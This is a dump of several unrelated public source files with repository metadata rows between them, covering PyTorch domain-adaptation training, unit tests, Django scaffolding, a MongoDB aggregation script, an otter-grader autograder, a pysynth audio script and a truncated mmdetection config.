(feature_fooling_src - feature_fooling_src0) * (feature_fooling_src - feature_fooling_src0))
feature_fooling_src.retain_grad()
loss_d_.backward()
gss = feature_fooling_src.grad
feature_fooling_src = feature_fooling_src + 2*gss
# optimizer_d.step()
feature_fooling_src = Variable(feature_fooling_src, requires_grad=True)
src_imgs_c = feature_fooling_src.reshape(feature_fooling_src.shape[0], 3, params.imgs_size, params.imgs_size)
for i_c in range(train_epochs[3]):
# source domain -Classifier
# 更新后的feature_fooling_src 要能被classifier正确分类
discriminator.zero_grad()
classifier.zero_grad()
pred = classifier.forward(feature_fooling_src)
loss_c_ = loss_c(pred, labels_src) - 0.1 * torch.sum(
(feature_fooling_src - feature_fooling_src0) * (feature_fooling_src - feature_fooling_src0))
loss_c_.backward()
gs = feature_fooling_src.grad
feature_fooling_src = feature_fooling_src + 3 * gs
feature_fooling_src = Variable(feature_fooling_src, requires_grad=True)
src_imgs_d = feature_fooling_src.reshape(feature_fooling_src.shape[0], 3, params.imgs_size, params.imgs_size)
# 前向传播
feature_src = Variable(
imgs_src.type(FloatTensor), requires_grad=False).reshape(imgs_src.shape[0], -1)
labels_src = Variable(labels_src.type(LongTensor))
feature_tgt = Variable(
imgs_tgt.type(FloatTensor), requires_grad=False).reshape(imgs_tgt.shape[0], -1)
labels_tgt = Variable(labels_tgt.type(LongTensor))
# classifier output
predict_prob_src = classifier(feature_src)
predict_prob_tgt = classifier(feature_tgt)
# discriminator output
domain_src = discriminator(feature_src)
domain_tgt = discriminator(feature_tgt)
domain_f_tgt = discriminator(feature_fooling_tgt)
domain_f_src = discriminator(feature_fooling_src)
# 计算loss domain_src
domain_label_src = Variable(FloatTensor(imgs_src.size(0), 1).fill_(domain_label[0]))
domain_label_tgt = Variable(FloatTensor(imgs_tgt.size(0), 1).fill_(domain_label[1]))
domain_label_f_src = Variable(FloatTensor(imgs_src.size(0), 1).fill_(domain_label[2]))
domain_label_f_tgt = Variable(FloatTensor(imgs_tgt.size(0), 1).fill_(domain_label[3]))
dloss_f = (loss_d(domain_f_src.detach(), domain_label_f_src) +
loss_d(domain_f_tgt.detach(), domain_label_f_tgt))
dloss = loss_d(domain_src, domain_label_src) + \
loss_d(domain_tgt, domain_label_tgt)
# loss_c_src = loss_c(predict_prob_src, labels_src) + loss_c(predict_prob_tgt, labels_tgt)
loss_c_src = loss_c(predict_prob_src, labels_src)
entropy = entropy_loss(predict_prob_tgt)
# 这是更新后生成的图片的损失
predict_prob_f_src = classifier(feature_fooling_src)
predict_prob_f_tgt = classifier(feature_fooling_tgt)
dis = torch.sum((predict_prob_f_tgt - predict_prob_tgt) *
(predict_prob_f_tgt - predict_prob_tgt))
loss_c_f_src = loss_c(predict_prob_f_src, labels_src)
with OptimizerManager([optimizer_c, optimizer_d]):
loss = loss_weight[0] * loss_c_src + loss_weight[1] * dloss + loss_weight[2] * dloss_f + \
loss_weight[3] * loss_c_f_src + loss_weight[4] * dis + loss_weight[5] * entropy
loss.backward()
# if (epoch+1) % 10 == 0:
# # 这里也把source domain准确率输出来看一下。
# # target domain的准确率先不输出,因为现在效果还不是很好。
# predict_prob_src, predict_prob_tgt = classifier(feature_src), classifier(feature_tgt)
# pred_src, pred_tgt = predict_prob_src.data.max(1)[1], predict_prob_tgt.data.max(1)[1]
# acc_src, acc_tgt = pred_src.eq(labels_src.data).cpu().sum(), pred_tgt.eq(labels_tgt.data).cpu().sum()
# print(
# "[Epoch {:d}/{:d}] [Batch {:d}/{:d}] [C loss: src:{:.3f}, f_src:{:.3f}] "
# "[D loss src:{:.3f} f_src:{:.3f}] [Acc src:{:.2%} tgt:{:.2%}]"
# "[dis:{:.3f} entropy:{:.3f}]"
# .format(epoch, train_epochs[0],
# st, len_dataloader,
# loss_c_src.item(), loss_c_f_src.item(),
# dloss.item(), dloss_f.item(),
# int(acc_src) / 100, int(acc_tgt) / 100,
# dis, entropy)
# )
if epoch >= save_samples_epoch:
# Save samples
# 总共五个部分: src_imgs, src_f_imgs_d, src_f_imgs_c, tgt_imgs, tgt_f_imgs
src_imgs = feature_src.reshape(feature_src.shape[0], 3, params.imgs_size, params.imgs_size)
tgt_imgs = feature_tgt.reshape(feature_tgt.shape[0], 3, params.imgs_size, params.imgs_size)
generate_imgs = torch.cat((src_imgs[10:30], src_imgs_d[10:30], src_imgs_c[10:30],
tgt_imgs[10:30], tgt_imgs_f[10:30]), 0)
save_image(generate_imgs, '../generate_samples/A_C/{}.png'.format(epoch), nrow=20, normalize=True)
print('epoch = {} Save samples!'.format(epoch))
def evaluate(classifier, dataloader_src, dataloader_tgt):
# 只需用到dataloader tgt
classifier.eval()
acc_src = acc_tgt = 0
for (imgs_tgt, labels_tgt) in dataloader_tgt:
feature_tgt = Variable(imgs_tgt.type(FloatTensor).expand(
imgs_tgt.shape[0], 3, params.imgs_size, params.imgs_size), requires_grad=False).reshape(imgs_tgt.shape[0], -1)
labels_tgt = Variable(labels_tgt.type(LongTensor))
predict_prob_tgt = classifier(feature_tgt)
pred_tgt = predict_prob_tgt.data.max(1)[1]
acc_tgt += pred_tgt.eq(labels_tgt.data).cpu().sum()
for (imgs_src, labels_src) in dataloader_src:
feature_src = Variable(imgs_src.type(FloatTensor)).reshape(imgs_src.shape[0], -1)
labels_src = Variable(labels_src.type(LongTensor))
predict_prob_src = classifier(feature_src)
pred_src = predict_prob_src.data.max(1)[1]
acc_src += pred_src.eq(labels_src.data).cpu().sum()
acc_src = int(acc_src) / len(dataloader_src.dataset)
acc_tgt = int(acc_tgt) / len(dataloader_tgt.dataset)
print("Src Accuracy = {:2%}, Tgt Accuracy = {:2%}".format(acc_src, acc_tgt))
def train_classifier(classifier, dataloader_src):
# 单独测试一下分类器效果
optimizer = optim.Adam(classifier.parameters(), lr=params.learning_rate,
betas=(params.beta1, params.beta2))
loss_c = nn.CrossEntropyLoss()
for epoch in range(params.classifier_epochs):
data_zip = enumerate(dataloader_src)
for step, (imgs_src, labels_src) in data_zip:
# adjust_lr(optimizer, step, optimizer.param_groups[0]['lr'])
feature_src = Variable(imgs_src.type(FloatTensor), requires_grad=False).reshape(imgs_src.shape[0],
-1)
labels_src = Variable(labels_src.type(LongTensor))
# feature_tgt = Variable(imgs_tgt.type(FloatTensor), requires_grad=True).reshape(imgs_tgt.shape[0],
# -1)
# labels_tgt = Variable(labels_tgt.type(LongTensor))
# with OptimizerManager([optimizer]):
# loss = loss_c(classifier(feature_src), labels_src)
# loss.backward()
optimizer.zero_grad()
loss = loss_c(classifier(feature_src), labels_src)
loss.backward()
optimizer.step()
if epoch % 20 == 0:
predict_prob_src = classifier(feature_src)
pred_src = predict_prob_src.data.max(1)[1]
acc_src = pred_src.eq(labels_src.data).cpu().sum()
print('acc:{:.3%}'.format(int(acc_src) / imgs_src.shape[0]))
torch.save(classifier.state_dict(), '../pth/classifier_src.pth')
if __name__ == '__main__':
from models import networks
from Images import data_preprocess
from torch.backends import cudnn
torch.backends.cudnn.benchmark = True
# get dataloader
amazon_path = os.path.join(params.imgs_root_path, r'amazon\images')
dslr_path = os.path.join(params.imgs_root_path, r'dslr\images')
webcam_path = os.path.join(params.imgs_root_path, r'webcam\images')
caltech_path = os.path.join(params.imgs_root_path, r'Clatech\clatech')
# 不使用target domain
amazon_dataloader = data_preprocess.get_dataloader(amazon_path, params.images_name)
dslr_dataloader = data_preprocess.get_dataloader(dslr_path, params.images_name)
webcam_dataloader = data_preprocess.get_dataloader(webcam_path, params.images_name)
caltech_dataloader = data_preprocess.get_dataloader(caltech_path, params.images_name)
# 目标域带标签的
# amazon_dataloader, dslr_dataloader = data_preprocess.get_src_tgt_dataloader(amazon_path, dslr_path, params.images_name)
# 初始化网络
classifier = networks.Classifier(3*params.imgs_size*params.imgs_size, len(params.images_name)).cuda()
discriminator = networks.LargeDiscriminator(3*params.imgs_size*params.imgs_size).cuda()
# 定义训练的次数:总迭代次数,tgt_discriminator, src_discriminator, src_classifier
train_epochs = [200, 20, 20, 20]
# domain label
domain_label = [1.0, 0.0, 1.0, 0.0]
# 各种loss的权重 loss_c_src + dloss + dloss_f + loss_c_f_src + dis + entropy
loss_weight = [1, 0.5, 0.5, 1.0, 1.0, 0.1]
save_samples_epoch = 0
train(discriminator, classifier, amazon_dataloader, dslr_dataloader, train_epochs, domain_label, loss_weight)
# train_generate_samples(discriminator, classifier, amazon_dataloader, caltech_dataloader, train_epochs, domain_label,
# loss_weight, save_samples_epoch)
|
[
"cccht619@gmail.com"
] |
cccht619@gmail.com
|
f833a0147426e6839d8c6c4b94930e3deef2695a
|
014f6b3b5dc7cb79ff76a3dec7251a4845298eee
|
/openpbp/test/test_asymmetric.py
|
3fcda6d873c1e69d0e00fead4dc1b825822ef2bd
|
[] |
no_license
|
shawa/pretty-bad-privacy
|
39f14e19d9e2948c154a2dc4e3691b7d55999e4f
|
16cc9a88b91c39f12a8fe472c89bed6bb71563d7
|
refs/heads/master
| 2021-01-10T03:48:03.384171
| 2016-04-04T12:17:04
| 2016-04-04T12:17:04
| 55,063,568
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,280
|
py
|
import unittest
import asymmetric
import os
import sys
from hypothesis import given, settings
from hypothesis.strategies import binary
import cryptography.hazmat.backends.openssl
class TestAsymmetric(unittest.TestCase):
def setUp(self):
self.kp = asymmetric.gen_keypair()
def gen_keypair(self):
self.assertNotNone(self.kp.pubkey)
self.assertNotNone(self.kp.privkey)
def test__load_pubkey(self):
pubkey_pem = self.kp.pubkey
key = asymmetric._load_pubkey(pubkey_pem)
self.assertIsNotNone(key)
def test__load_privkey(self):
privkey_pem = self.kp.privkey
key = asymmetric._load_privkey(privkey_pem)
self.assertIsNotNone(key)
@given(binary())
def test_encrypt_decrypt(self, plaintext):
ciphertext = asymmetric.encrypt(plaintext, self.kp.pubkey)
self.assertIsNotNone(ciphertext)
decrypted = asymmetric.decrypt(ciphertext, self.kp.privkey)
self.assertEqual(plaintext, decrypted)
@given(binary(min_size=1))
def test_sign_verify(self, message):
sig = asymmetric.sign(message, self.kp.privkey)
valid = asymmetric.verify(message, sig, self.kp.pubkey)
self.assertTrue(valid)
if __name__ == '__main__':
unittest.main()
|
[
"shawa1@tcd.ie"
] |
shawa1@tcd.ie
|
916db4106bd8791b8f778270d70db8aec40fd37f
|
ac388c2af5405284700cf3531f3b711c3974db75
|
/main/__init__.py
|
4a553f72b8d27e61c39dcae77964fd3ee9fb5a19
|
[] |
no_license
|
jimapple/Bitcorn_demo
|
1332403b285754996da7b88ca320b155f9a76147
|
d93393a61e2bca63d58595921d27a7d11ec164e8
|
refs/heads/master
| 2021-08-24T00:30:07.214856
| 2017-12-07T08:21:02
| 2017-12-07T08:21:02
| 113,412,642
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 44
|
py
|
__all__ = [
'bitcorn',
'u_bitcorn'
]
|
[
"609127041@qq.com"
] |
609127041@qq.com
|
53aa1b185bea2ffed12ea857520aadb1e656777e
|
63fb1e770ee4314d02acf14291cf71d466e4997b
|
/test/integration/autograder-correct/run_autograder
|
1b2b8f9eaf187dc834258e8a9e631da1b27c6d26
|
[
"BSD-3-Clause"
] |
permissive
|
TylerADavis/otter-grader
|
8266f75bbb7ee848bcef143b94b6c67bcae76ad7
|
9f245a13022b15a20a8340140a9084c550cfba80
|
refs/heads/master
| 2021-01-16T13:56:59.181420
| 2020-02-25T21:14:29
| 2020-02-25T21:14:29
| 243,145,370
| 0
| 0
|
BSD-3-Clause
| 2020-02-26T02:00:44
| 2020-02-26T02:00:44
| null |
UTF-8
|
Python
| false
| false
| 2,677
|
#!/usr/bin/env python3
from otter.grade import grade_notebook
from glob import glob
import json
import os
import shutil
import subprocess
import re
import pprint
import pandas as pd
SCORE_THRESHOLD = None
POINTS_POSSIBLE = None
UTILS_IMPORT_REGEX = r"\"from utils import [\w\*, ]+"
NOTEBOOK_INSTANCE_REGEX = r"otter.Notebook\(.+\)"
if __name__ == "__main__":
# put files into submission directory
if os.path.exists("/autograder/source/files"):
for filename in glob("/autograder/source/files/*.*"):
shutil.copy(filename, "/autograder/submission")
# create __init__.py files
subprocess.run(["touch", "/autograder/__init__.py"])
subprocess.run(["touch", "/autograder/submission/__init__.py"])
os.chdir("/autograder/submission")
# check for *.ipynb.json files
jsons = glob("*.ipynb.json")
for file in jsons:
shutil.copy(file, file[:-5])
nb_path = glob("*.ipynb")[0]
# fix utils import
try:
with open(nb_path) as f:
contents = f.read()
except UnicodeDecodeError:
with open(nb_path, "r", encoding="utf-8") as f:
contents = f.read()
contents = re.sub(UTILS_IMPORT_REGEX, "\"from .utils import *", contents)
contents = re.sub(NOTEBOOK_INSTANCE_REGEX, "otter.Notebook()", contents)
try:
with open(nb_path, "w") as f:
f.write(contents)
except UnicodeEncodeError:
with open(nb_path, "w", encoding="utf-8") as f:
f.write(contents)
try:
os.mkdir("/autograder/submission/tests")
except FileExistsError:
pass
tests_glob = glob("/autograder/source/tests/*.py")
for file in tests_glob:
shutil.copy(file, "/autograder/submission/tests")
scores = grade_notebook(nb_path, tests_glob, name="submission", ignore_errors=True, gradescope=True)
# del scores["TEST_HINTS"]
output = {"tests" : []}
for key in scores:
if key != "total" and key != "possible":
output["tests"] += [{
"name" : key,
"score" : scores[key]["score"],
"possible": scores[key]["possible"],
"visibility": ("visible", "hidden")[scores[key]["hidden"]]
}]
if "hint" in scores[key]:
output["tests"][-1]["output"] = repr(scores[key]["hint"])
output["visibility"] = "hidden"
if POINTS_POSSIBLE is not None:
output["score"] = scores["total"] / scores["possible"] * POINTS_POSSIBLE
if SCORE_THRESHOLD is not None:
if scores["total"] / scores["possible"] >= SCORE_THRESHOLD:
output["score"] = POINTS_POSSIBLE or scores["possible"]
else:
output["score"] = 0
with open("/autograder/results/results.json", "w+") as f:
json.dump(output, f)
print("\n\n")
df = pd.DataFrame(output["tests"])
if "output" in df.columns:
df.drop(columns=["output"], inplace=True)
# df.drop(columns=["hidden"], inplace=True)
print(df)
|
[
"cpyles@berkeley.edu"
] |
cpyles@berkeley.edu
|
|
406885e2bae201a8afd06ed96e97034725edb058
|
904985f94f055f758f1848d791ca0919d0a1854a
|
/tests/test_conservation.py
|
040d99f5193fde4b43003ae22ed481e7c9128778
|
[] |
no_license
|
Sigmanificient/XCrypt
|
b3b8212d41441c5515177e33127668d0f0860da5
|
a9d5af9e5d0f8eb93b32e18b1b85fcc826ac1e15
|
refs/heads/master
| 2023-07-08T19:32:05.299434
| 2021-08-17T23:14:46
| 2021-08-17T23:14:46
| 397,388,757
| 1
| 0
| null | 2021-08-17T21:33:29
| 2021-08-17T20:54:43
|
Python
|
UTF-8
|
Python
| false
| false
| 599
|
py
|
import os
import random
import string
import unittest
import xcrypt
class MyTestCase(unittest.TestCase):
def test_conservation(self):
key = xcrypt.make_key()
for _ in range(100):
seq = ''.join(random.choice(string.hexdigits) for _ in range(500))
enc: str = xcrypt.encode(key, seq)
self.assertEqual(xcrypt.decode(key, enc), seq)
@classmethod
def tearDownClass(cls) -> None:
for file in os.listdir('.'):
if file.endswith('.key'):
os.remove(file)
if __name__ == '__main__':
unittest.main()
|
[
"edhyjox@gmail.com"
] |
edhyjox@gmail.com
|
8d2ca06eeba361ebe34feef3996b6e6043773d1a
|
53fdf4ae35af6884445929d576869ff6627a8b50
|
/manage.py
|
6095b2aa60a0a55a9e0ba619d51f9e028e9bc7b9
|
[] |
no_license
|
kippum99/Glimpse
|
bd50a4cdd32ffdeafefdc7a6a894a1c091627c7d
|
f60b055dc58ab223e9c40463b637588cee1789b1
|
refs/heads/master
| 2020-03-27T20:43:51.376146
| 2018-10-24T05:54:22
| 2018-10-24T05:54:22
| 147,089,994
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 539
|
py
|
#!/usr/bin/env python
import os
import sys
if __name__ == '__main__':
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Glimpse.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
|
[
"junekim@Junes-MacBook-Pro.local"
] |
junekim@Junes-MacBook-Pro.local
|
0d297e9b1049c217cc4d0021507feaa54bc8184c
|
989936aecaa9304c8aa2dd329fce29c8456a2b2a
|
/OculusServer/wsgi.py
|
8cbf6dd042f21434f2f8473000669be70fc89167
|
[
"Apache-2.0"
] |
permissive
|
edisonzhao/OculusServer
|
ab167163bf8491c01d6b2729d632be934c625d48
|
0337637f27d47991fdaf4e0f0612bac9400ac554
|
refs/heads/master
| 2016-08-11T09:00:47.434542
| 2015-10-25T04:58:57
| 2015-10-25T04:58:57
| 44,896,664
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 401
|
py
|
"""
WSGI config for OculusServer project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "OculusServer.settings")
application = get_wsgi_application()
|
[
"edisonzyzhao@gmail.com"
] |
edisonzyzhao@gmail.com
|
a572021fd04c049baa3315bbf6f3cc257cbe07b2
|
2d8695c2b7f9418b34c4934a5d827079466f26fa
|
/linkedlist/singly/reverse.py
|
a27f8b5366a31f399fb0c48b2f6c3c936f9b491f
|
[] |
no_license
|
obaid147/python_ds_algos
|
9dc8fc85ae625c5a39044fd028f4b79d6157921c
|
39303908a4462ef285e65043a151ac26b2baa311
|
refs/heads/master
| 2022-11-26T07:54:37.107871
| 2020-08-03T07:02:11
| 2020-08-03T07:02:11
| 257,626,023
| 1
| 1
| null | 2020-05-13T15:26:01
| 2020-04-21T14:42:31
|
Python
|
UTF-8
|
Python
| false
| false
| 710
|
py
|
class Node:
def __init__(self, data):
self.data = data
self.next = None
class SinglyLinkedList:
def __init__(self):
self.head = None
# Time Complexity --> O(n)
def reverseLinkedList(self):
if not self.head:
return
prev_Node = None
current = self.head
while current:
next_Node = current.next
# break link
current.next = prev_Node
# new node
prev_Node = current
current = next_Node
self.head = prev_Node
ll = SinglyLinkedList()
ll.head = Node(1)
second = Node(2)
third = Node(3)
ll.head.next = second
second.next = third
ll.reverseLinkedList()
|
[
"obaidfayazwani@gmail.com"
] |
obaidfayazwani@gmail.com
|
f909d3411cd6dc6251fe0b423103760cc9ea7593
|
924763dfaa833a898a120c411a5ed3b2d9b2f8c7
|
/compiled/python/params_pass_bool.py
|
00502f37c5eb03db1dc7240108d5760495a113e3
|
[
"MIT"
] |
permissive
|
kaitai-io/ci_targets
|
31257dfdf77044d32a659ab7b8ec7da083f12d25
|
2f06d144c5789ae909225583df32e2ceb41483a3
|
refs/heads/master
| 2023-08-25T02:27:30.233334
| 2023-08-04T18:54:45
| 2023-08-04T18:54:45
| 87,530,818
| 4
| 6
|
MIT
| 2023-07-28T22:12:01
| 2017-04-07T09:44:44
|
C++
|
UTF-8
|
Python
| false
| false
| 2,429
|
py
|
# This is a generated file! Please edit source .ksy file and use kaitai-struct-compiler to rebuild
# type: ignore
import kaitaistruct
from kaitaistruct import KaitaiStruct, KaitaiStream, BytesIO
if getattr(kaitaistruct, 'API_VERSION', (0, 9)) < (0, 9):
raise Exception("Incompatible Kaitai Struct Python API: 0.9 or later is required, but you have %s" % (kaitaistruct.__version__))
class ParamsPassBool(KaitaiStruct):
def __init__(self, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self._read()
def _read(self):
self.s_false = self._io.read_bits_int_be(1) != 0
self.s_true = self._io.read_bits_int_be(1) != 0
self._io.align_to_byte()
self.seq_b1 = ParamsPassBool.ParamTypeB1(self.s_true, self._io, self, self._root)
self.seq_bool = ParamsPassBool.ParamTypeBool(self.s_false, self._io, self, self._root)
self.literal_b1 = ParamsPassBool.ParamTypeB1(False, self._io, self, self._root)
self.literal_bool = ParamsPassBool.ParamTypeBool(True, self._io, self, self._root)
self.inst_b1 = ParamsPassBool.ParamTypeB1(self.v_true, self._io, self, self._root)
self.inst_bool = ParamsPassBool.ParamTypeBool(self.v_false, self._io, self, self._root)
class ParamTypeB1(KaitaiStruct):
def __init__(self, arg, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self.arg = arg
self._read()
def _read(self):
self.foo = self._io.read_bytes((1 if self.arg else 2))
class ParamTypeBool(KaitaiStruct):
def __init__(self, arg, _io, _parent=None, _root=None):
self._io = _io
self._parent = _parent
self._root = _root if _root else self
self.arg = arg
self._read()
def _read(self):
self.foo = self._io.read_bytes((1 if self.arg else 2))
@property
def v_false(self):
if hasattr(self, '_m_v_false'):
return self._m_v_false
self._m_v_false = False
return getattr(self, '_m_v_false', None)
@property
def v_true(self):
if hasattr(self, '_m_v_true'):
return self._m_v_true
self._m_v_true = True
return getattr(self, '_m_v_true', None)
|
[
"kaitai-bot@kaitai.io"
] |
kaitai-bot@kaitai.io
|
4f8cb442b126c2879d7a39a87916f78e9d53a6c7
|
c9169ae263bb28a231d8c6553cc44db12ab08317
|
/data_sequence2.py
|
649a06a22ea8a255b6e755525bbe9a9b3e9b8ad6
|
[] |
no_license
|
alyssum07/MongoDB
|
620ea9b3e47dad83d51a972f6aeee98883bd2ae2
|
f3db932172ad629c0d9fa39cbb386453e9a0c221
|
refs/heads/master
| 2022-09-29T14:43:30.056959
| 2020-05-31T14:54:16
| 2020-05-31T14:54:16
| 268,301,424
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,311
|
py
|
from pymongo import MongoClient
import pymongo
import datetime
date = datetime.date.today()
netq_collec = f'symphonyorder_netquantity_{date}'
# filtered_collec = f'neworders_{date}'
cumulative_collec = f"cumulative_{date}"
all_list_client_collec = f"client"
connection = MongoClient('localhost', 27017)
try:
cumulative_db = connection['Cumulative_symphonyorder']
all_list_db = connection['all_list']
# new_db = connection['symphonyorder_filtered']
except Exception:
print("ERROR: Mongo Connection Error123")
try:
netq_db = connection['symphonyorder_netquantity']
netq_db[netq_collec].drop()
print('Netq Collec Deleted')
except:
pass
client = all_list_db[all_list_client_collec].distinct("client")
client.remove("All")
def savedata(post):
try:
client = MongoClient()
db = client['symphonyorder_netquantity']
collec = f"symphonyorder_netquantity_{date}"
db.create_collection(collec)
print(f"Created New Collection '{collec}'")
db[collec].insert_one(post)
#print(post)
except Exception:
new_match=match = db[collec].find_one({ "$and" : [{"clientID":post['clientID']},{"symbol":post['symbol']}] })
if new_match:
# print(new_match)
if(new_match["quantity"]!=post["quantity"]):
db[collec].update({'_id': new_match['_id']}, {"$set": {"quantity":post["quantity"]}})
else:
db[collec].insert_one(post)
print("new Quantities Added")
def check_data():
while True:
for client_id in client:
new_client = cumulative_db[cumulative_collec].find_one({"clientID": client_id})
if new_client:
match=cumulative_db[cumulative_collec].aggregate([{"$match":{"clientID":client_id}},{"$group":{"_id":"$symbol","quantity":{"$sum":"$quantity"}}} ])
for i in match:
# print(client_id," ",i)
post={
"clientID":client_id,
"symbol":i["_id"],
"quantity":i["quantity"]
}
# print(post)
savedata(post)
check_data()
|
[
"noreply@github.com"
] |
alyssum07.noreply@github.com
|
a9756b61c8654e0de01fd685e38c66fe80899ec3
|
1298bca44f9304ba13c1f871c727b1517d05d515
|
/Audio_Playback.py
|
b31db5fc852c738d34103ae7df126198f1f8f4bb
|
[] |
no_license
|
Dpp3a/DJMM
|
af3f57a301d704704bc15519d1fff1a6772f2f79
|
b0c57f4926451fb7e4589bb3e97381a94dbca24e
|
refs/heads/master
| 2020-04-03T04:49:10.380890
| 2018-10-29T22:02:28
| 2018-10-29T22:02:28
| 155,024,917
| 0
| 0
| null | 2018-10-28T01:30:26
| 2018-10-28T01:30:26
| null |
UTF-8
|
Python
| false
| false
| 2,492
|
py
|
#!/usr/bin/env python3
import sys
import pysynth as ps
from pydub import AudioSegment
from pydub.playback import play
import re
#Script for taking the musical notes and playing them back as audio for project DJMM Prog4Bio 2018
#Using pysynth to make the wav file
#Note names have to be a to g
#sharps = #, flats = b
#format is (note, duration) with 4 as a quarter note, x is a whole note
#Make all lowercase
#Take the music notes generated from the song
#keynotes = sys.argv[1]
keynotes = ['B2', 'E4', 'G4', 'G#', 'D', 'G2', 'D#', 'G4', 'D3', 'G#2', 'C3', 'D2', 'F', 'B', 'D#3', 'G4', 'C3', 'E3', 'D#4', 'C#', 'C#', 'D3', 'C#', 'B2', 'B', 'C', 'G#', 'F2', 'C#3', 'E2', 'F#', ' ', 'G4', 'G#', 'F#3', 'C2', 'F#', 'F#4', 'E4', 'F#2', 'G', 'D4', 'C#3', 'F', 'F2', 'A#2', ' ', 'C#3', 'F#', 'E4', 'F2', 'B2', 'D#3', 'F#', 'G#2', 'C', 'G#2', 'E2', 'F#2', 'G2', 'B', ' ', 'D3', 'G2', 'F#', 'G4', 'D#3', 'G#2', 'B2', 'C3', 'D4', 'E3', 'F3', 'C#2', 'E4', 'E3', 'C#2', 'C4', 'C2', 'G#2', 'C2', 'E', ' 2', 'C', 'G#', 'C4', 'D#3', 'F2', 'D#4', 'C4', 'G#2', 'F', 'G#2', 'C', 'G#2', 'C4', 'D#4', 'C4', 'G#2', 'C#4', 'G#2', 'C', 'G#2', 'C4', 'D#4', 'C4', 'G#2', 'C#4', 'G#2', 'C', 'G#2', 'C4', 'D#4', 'C4', 'G#2', 'C#4', 'G#2', 'C', 'G#2', 'C4', 'D#4', 'C4', 'G#2', 'C#4', 'G#2', 'C', 'G#2', 'C4', 'D#4', 'C4', 'G#2', 'C#4', 'G#2', 'C', 'G#2', 'C4', 'D#4', 'C4', 'G#2']
#keynotes = ['G4', ' 2', 'C3', ' ', 'G2', 'C2', 'E', 'C#', 'C#4']
test = []
for note in keynotes:
note = note.lower()
if " 2" == note:
value = ['r',4]
test.append(value)
elif "2" in note:
note_letter = re.search(r"([A-Za-z]+#?)\d?", note)
value = [note_letter.group(1),4]
#print("Found a 2")
test.append(value)
#print(note)
#print(value)
#print(test)
#Stay positive
elif "4" in note:
note_letter = re.search(r"([A-Za-z]+#?)\d?", note)
value = [note_letter.group(1)+"5",4]
test.append(value)
#print(test)
elif "3" in note:
note_letter = re.search(r"([A-Za-z]+#?)\d?", note)
value = [note_letter.group(1)+"5",2]
test.append(value)
#print(test)
elif " " in note:
value = ['r',2]
test.append(value)
else:
note_letter = re.search(r"([A-Za-z]+#?)\d?", note)
value = [note_letter.group(1),2]
test.append(value)
#test = (('c', 4), ('e', 4), ('g', 4),
# ('c5', -2), ('e6', 8), ('d#6', 2))
ps.make_wav(test, fn = "test_real.wav", bpm = 360)
#Using Pydub to play the wav file generated
sound_file = "test_real.wav"
sound = AudioSegment.from_file(sound_file, format="wav")
play(sound)
|
[
"jfo@pfb06.cshl.edu"
] |
jfo@pfb06.cshl.edu
|
3502a01179712906c54bd114904bb556dc9e6add
|
e5985846ab9f0ad840f260ff5bd99bd006edfd92
|
/works/admin.py
|
647b4cb7e0355bd0a32de98db4597fb63e098a94
|
[] |
no_license
|
Achekeev/Klinika
|
ff60ffe14887a063622db0939cef2016b819d2d0
|
5893ef7e30d04c32f6ea40c8eea1c174c791ae80
|
refs/heads/main
| 2023-03-05T06:14:44.189490
| 2021-02-17T11:10:03
| 2021-02-17T11:10:03
| 330,867,766
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,289
|
py
|
from django.contrib import admin
from .models import Works, Blogs, Asks, Feedback, Online
@admin.register(Works)
class WorksAdmin(admin.ModelAdmin):
list_display = ['opera', 'beforeopera', 'afteropera', 'name']
list_filter = ['opera']
fields = ('opera', 'beforeopera', 'afteropera', 'name')
# readonly_fields = ['beforeopera', 'afteropera', 'name']
class Meta:
verbose_name = 'Работы'
verbose_name_plural = 'Работы'
@admin.register(Blogs)
class BlogAdmin(admin.ModelAdmin):
list_display = ['name_blog']
fields = ('name_blog', 'photo', 'blog', 'url_blog')
class Meta:
verbose_name = 'Блог'
verbose_name_plural = 'Блог'
@admin.register(Asks)
class AsksAdmin(admin.ModelAdmin):
list_display = ['fio', 'phone', 'mail', 'date']
readonly_fields = ('fio', 'phone', 'mail', 'message', 'date')
class Meta:
verbose_name = 'Вопросы'
verbose_name_plural = 'Вопросы'
@admin.register(Feedback)
class FeedbackAdmin(admin.ModelAdmin):
list_display = ['name', ]
readonly_fields = ('name', 'photo', 'feedback')
@admin.register(Online)
class OnlineAdmin(admin.ModelAdmin):
list_display = ['fio', ]
readonly_fields = ('fio', 'phone', 'opera', 'message')
|
[
"bolotbekovtaalay@gmail.com"
] |
bolotbekovtaalay@gmail.com
|
7282770b17f53bca0b6cafbe04fa6ef625452666
|
79f78f91827953851090b55137fd04bed4596860
|
/mmdetection/configs/faster_rcnn_hr50_fpn_1x.py
|
1209f48e89eed8f8c185ad032b4194be4d4f24bf
|
[
"Apache-2.0",
"BSD-3-Clause"
] |
permissive
|
matej-ulicny/harmonic-networks
|
850c20b45844d77977ade676e98b73fc4e7da7f1
|
de2bbc636b0f1b928e3e043d4bd3090d100ff627
|
refs/heads/master
| 2022-05-04T15:18:43.334953
| 2022-04-22T12:16:05
| 2022-04-22T12:16:05
| 184,291,128
| 52
| 9
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,933
|
py
|
# model settings
model = dict(
type='FasterRCNN',
pretrained='https://github.com/matej-ulicny/harmonic-networks/releases/download/0.1.0/harm_resnet50-eec30392.pth',
backbone=dict(
type='HarmResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
style='pytorch'),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
num_outs=5),
rpn_head=dict(
